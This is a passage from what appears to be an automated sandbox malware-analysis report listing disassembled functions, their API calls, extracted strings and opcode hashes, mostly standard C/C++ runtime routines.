                                              • Instruction Fuzzy Hash: 8BE04632A12228EBCB10CB888904A8AB3ACEB45B04B1100A6B905D3600C2B0EE00C7D0
                                              Function 6C2CA720 Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                              • Instruction ID: b32dbd86ef5ebff34dadf6067629e5cad3e8b0861abbfda256038d014444f525
                                              • Opcode Fuzzy Hash: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                              • Instruction Fuzzy Hash: FEC08CA722910057C302EA2599C0BAEF6B37360330F228D2EA0A2E7E43C328C0788112
                                              Function 6C261B50 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 341COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                              • API String ID: 3519838083-609671
                                              • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                              • Instruction ID: 931f3621e052f2bf2182da360d621de1572f6fdc7347cfcb5fe2b14ba7c6c34c
                                              • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                              • Instruction Fuzzy Hash: 36D17B71A0420E9FDB01CFA5D980AEEB7B5FF05309F244529E855A3A60DB74E989CB70
                                              Function 6C249798 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 461COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: __aulldiv$H_prolog
                                              • String ID: >WJ$x$x
                                              • API String ID: 2300968129-3162267903
                                              • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                              • Instruction ID: ce02eef34edec1676757e4502149a5b5b446fee5bcf35c58b674edd6efce9df4
                                              • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                              • Instruction Fuzzy Hash: AE128C7190021EDFDF18EFA8C980ADDBBB9FF08318F248169E919AB650CB359954CF50
                                              Function 6C1FD1C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                              Download Yara Rule
                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 6C1FD1F7
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6C1FD1FF
                                              • _ValidateLocalCookies.LIBCMT ref: 6C1FD288
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6C1FD2B3
                                              • _ValidateLocalCookies.LIBCMT ref: 6C1FD308
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 1170836740-1018135373
                                              • Opcode ID: f9441859256a9fe1a8d02d890418d14854e0b446076d5462e8f06472b5a63e1c
                                              • Instruction ID: da500459c1b5b9b359026c5494b6a62f62324502ca818492aa106a4945ab0462
                                              • Opcode Fuzzy Hash: f9441859256a9fe1a8d02d890418d14854e0b446076d5462e8f06472b5a63e1c
                                              • Instruction Fuzzy Hash: 47419334A0121DABCF00EF68C884AAE7BF5AF45318F148155ED349BB91DB31DA06CBD1
                                              Function 6C20A58A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: api-ms-$ext-ms-
                                              • API String ID: 0-537541572
                                              • Opcode ID: 7fcc79ab3d9fea6f889cc27ccc6df15dae85a213cd67399ef0ac69890308cf6b
                                              • Instruction ID: fbd9911932b3e33392177fbff70269557ebabb0d8b2585e59f1269bbb4768fdd
                                              • Opcode Fuzzy Hash: 7fcc79ab3d9fea6f889cc27ccc6df15dae85a213cd67399ef0ac69890308cf6b
                                              • Instruction Fuzzy Hash: 1621BB72F0921EEBDF118A79CC88E4A37B4AB127B9F550612FD15A76C0DA34DC01C6E4
                                              Function 6C20F5A1 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetConsoleCP.KERNEL32(?,6C20E7C0,?), ref: 6C20F5E9
                                              • __fassign.LIBCMT ref: 6C20F7C8
                                              • __fassign.LIBCMT ref: 6C20F7E5
                                              • WriteFile.KERNEL32(?,6C2191A6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C20F82D
                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C20F86D
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C20F919
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: FileWrite__fassign$ConsoleErrorLast
                                              • String ID:
                                              • API String ID: 4031098158-0
                                              • Opcode ID: c57935d91a100bf5a5225ff7d828c06b8ff8f8d7955fe62731d00a9ce7b15518
                                              • Instruction ID: ee7748c8769e15e628876ba596821d6ccb41ff81c7b881024d158266e96013a6
                                              • Opcode Fuzzy Hash: c57935d91a100bf5a5225ff7d828c06b8ff8f8d7955fe62731d00a9ce7b15518
                                              • Instruction Fuzzy Hash: B2D1AA75E0124D9FCF11CFA8C8809EEBBB5BF49314F28016AE865BB251D731AA46CB54
                                              Function 6C0C2F60 Relevance: 9.1, APIs: 6, Instructions: 107COMMON
                                              Download Yara Rule
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C0C2F95
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C0C2FAF
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C2FD0
                                              • __Getctype.LIBCPMT ref: 6C0C3084
                                              • std::_Facet_Register.LIBCPMT ref: 6C0C309C
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C30B7
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                              • String ID:
                                              • API String ID: 1102183713-0
                                              • Opcode ID: 80ebe4a101f410483f2ffd749594e987ba813d15bf76e95a7edce1c9add9d53a
                                              • Instruction ID: 9354233649826effa485a0887e8b2b0d01d4a9fbe66184c5a81a434bef22208a
                                              • Opcode Fuzzy Hash: 80ebe4a101f410483f2ffd749594e987ba813d15bf76e95a7edce1c9add9d53a
                                              • Instruction Fuzzy Hash: 244137B2E006188FDB10CF98D864BDEB7F4FF48728F144129D869ABB90D775A905CB91
                                              Function 6C237FA6 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: __aulldiv$__aullrem
                                              • String ID:
                                              • API String ID: 2022606265-0
                                              • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                              • Instruction ID: e46454db3db42c66fc3e9b7ce7350dedfd050f1d64d3b6dce849d928ed574ffd
                                              • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                              • Instruction Fuzzy Hash: 3921C3B064126EFEDF108E94CC40DDF7B6DEB417A9F208227BD28A5690DA718D50D662
                                              Function 6C23D6EC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 183COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C23D6F1
                                                • Part of subcall function 6C24C173: __EH_prolog.LIBCMT ref: 6C24C178
                                              • __EH_prolog.LIBCMT ref: 6C23D8F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: IJ$WIJ$J
                                              • API String ID: 3519838083-740443243
                                              • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                              • Instruction ID: e434575ba6d7fbf68d4cd06f4090d8c5f5d160a59367cc010fee2eef8031f770
                                              • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                              • Instruction Fuzzy Hash: C071AE70910269DFDB14DFA4C484BEDB7B4BF14308F1085A9EC596BB91CB78BA09CB91
                                              Function 6C2190FD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 6C2191CD
                                              • _free.LIBCMT ref: 6C2191F6
                                              • SetEndOfFile.KERNEL32(00000000,6C217DDC,00000000,6C20E7C0,?,?,?,?,?,?,?,6C217DDC,6C20E7C0,00000000), ref: 6C219228
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C217DDC,6C20E7C0,00000000,?,?,?,?,00000000,?), ref: 6C219244
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFileLast
                                              • String ID: 8Q
                                              • API String ID: 1547350101-4022487301
                                              • Opcode ID: fc7295cd3bd06f04f58469fe149cf774bded88a62fbdd4edf5a51d1b794aca83
                                              • Instruction ID: da65b913903cad4d0702c3ba5e3f7aa4600a6f66fcadce606e9ec69817e6c375
                                              • Opcode Fuzzy Hash: fc7295cd3bd06f04f58469fe149cf774bded88a62fbdd4edf5a51d1b794aca83
                                              • Instruction Fuzzy Hash: F641B832A0960D9ADB01ABACCC44BCD37F6AF45334F140515FE24A7F90EB31D8A94751
                                              Function 6C251418 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C25141D
                                                • Part of subcall function 6C251E40: __EH_prolog.LIBCMT ref: 6C251E45
                                                • Part of subcall function 6C2518EB: __EH_prolog.LIBCMT ref: 6C2518F0
                                                • Part of subcall function 6C251593: __EH_prolog.LIBCMT ref: 6C251598
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: &qB$0aJ$A0$XqB
                                              • API String ID: 3519838083-1326096578
                                              • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                              • Instruction ID: 698e4824ae6cc9fa0df85d253cd64c4b7701bd280e60e46bb2014124f2bd6027
                                              • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                              • Instruction Fuzzy Hash: E921BB70D0125CAACF04DFE4D9819EDBBB4AF25308F600129D81223781DB784E4CCB61
                                              Function 6C251234 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: J$0J$DJ$`J
                                              • API String ID: 3519838083-2453737217
                                              • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                              • Instruction ID: 7a7741f45864b4d8fc4e7495ce5923d68726aed1473514961290b45a7223314c
                                              • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                              • Instruction Fuzzy Hash: AF11C2B0900B68CEC724DF5AC45419AFBE4BFA5708B10CA1FC4A687B50C7F8A549CB99
                                              Function 6C20281A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C2028A4,?,?,6C202925,?,?,?), ref: 6C20282F
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C202842
                                              • FreeLibrary.KERNEL32(00000000,?,?,6C2028A4,?,?,6C202925,?,?,?), ref: 6C202865
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: 5a14ae2b555e9ab7f728332c0d73c5948ec6e8865da7ea6a3729053d11302c93
                                              • Instruction ID: 615b89a1821be4796f66bfe8902afbc1fcd9b625e5876833a8c3fab35fb5e7c4
                                              • Opcode Fuzzy Hash: 5a14ae2b555e9ab7f728332c0d73c5948ec6e8865da7ea6a3729053d11302c93
                                              • Instruction Fuzzy Hash: 56F0583071521DFBDB01AB60C80DB9EBA7DBB01B6AF114066BC00A24A0CF388A01DBA0
                                              Function 6C1FAA17 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C1FAA1E
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C1FAA29
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C1FAA97
                                                • Part of subcall function 6C1FA920: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C1FA938
                                              • std::locale::_Setgloballocale.LIBCPMT ref: 6C1FAA44
                                              • _Yarn.LIBCPMT ref: 6C1FAA5A
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                              • String ID:
                                              • API String ID: 1088826258-0
                                              • Opcode ID: 0277b8f517b27604e1f62203e072f0943baff9ab34d431542be464755e014dd9
                                              • Instruction ID: c5674a53fa030c1ed96fdb5dca7e4363ca7bf337514abaf7a516075c1bb2dff9
                                              • Opcode Fuzzy Hash: 0277b8f517b27604e1f62203e072f0943baff9ab34d431542be464755e014dd9
                                              • Instruction Fuzzy Hash: BD01BC79B112189FDB06DF20C864ABC7BF1FF95658B180048DC2217B80CF38AA0BCB81
                                              Function 6C279E3F Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 452COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $!$@
                                              • API String ID: 3519838083-2517134481
                                              • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                              • Instruction ID: e285bd7388511030c3deaa77c5cb499c8c7f58b8e819bf075bcdbeef3486c21b
                                              • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                              • Instruction Fuzzy Hash: 6E129A30A0624EDFCB24DFA4C4D0ADDBBB1BF08319F14946AE805ABB51DB35E955CB60
                                              Function 6C245B91 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog__aulldiv
                                              • String ID: $SJ
                                              • API String ID: 4125985754-3948962906
                                              • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                              • Instruction ID: 54989f2db4c0d3f8faf50de78fe7398bfbd23355c76b46376200350905aa4dd4
                                              • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                              • Instruction Fuzzy Hash: 69B12CB5E0020EDFCB18CF95C8809AEBBB5FF48315B60853EE956A7B50D730AA45CB50
                                              Function 6C0C2020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 6C1FAA17: __EH_prolog3.LIBCMT ref: 6C1FAA1E
                                                • Part of subcall function 6C1FAA17: std::_Lockit::_Lockit.LIBCPMT ref: 6C1FAA29
                                                • Part of subcall function 6C1FAA17: std::locale::_Setgloballocale.LIBCPMT ref: 6C1FAA44
                                                • Part of subcall function 6C1FAA17: _Yarn.LIBCPMT ref: 6C1FAA5A
                                                • Part of subcall function 6C1FAA17: std::_Lockit::~_Lockit.LIBCPMT ref: 6C1FAA97
                                                • Part of subcall function 6C0C2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C0C2F95
                                                • Part of subcall function 6C0C2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C0C2FAF
                                                • Part of subcall function 6C0C2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C2FD0
                                                • Part of subcall function 6C0C2F60: __Getctype.LIBCPMT ref: 6C0C3084
                                                • Part of subcall function 6C0C2F60: std::_Facet_Register.LIBCPMT ref: 6C0C309C
                                                • Part of subcall function 6C0C2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C30B7
                                              • std::ios_base::_Addstd.LIBCPMT ref: 6C0C211B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                              • API String ID: 3332196525-1866435925
                                              • Opcode ID: 25274ee18c3ed251ef734868162f6457e46e3cb3c70b9baa7325e0465d5b6f85
                                              • Instruction ID: 5fcaff7139d5d85fa6fe2354665cce87eefdd471f1342065b7ecaab055dde155
                                              • Opcode Fuzzy Hash: 25274ee18c3ed251ef734868162f6457e46e3cb3c70b9baa7325e0465d5b6f85
                                              • Instruction Fuzzy Hash: A241B0B1A003099FDB00CF64C8497AEBBF0FF48714F105268E919ABB91E775A985CF91
                                              Function 6C2491D6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
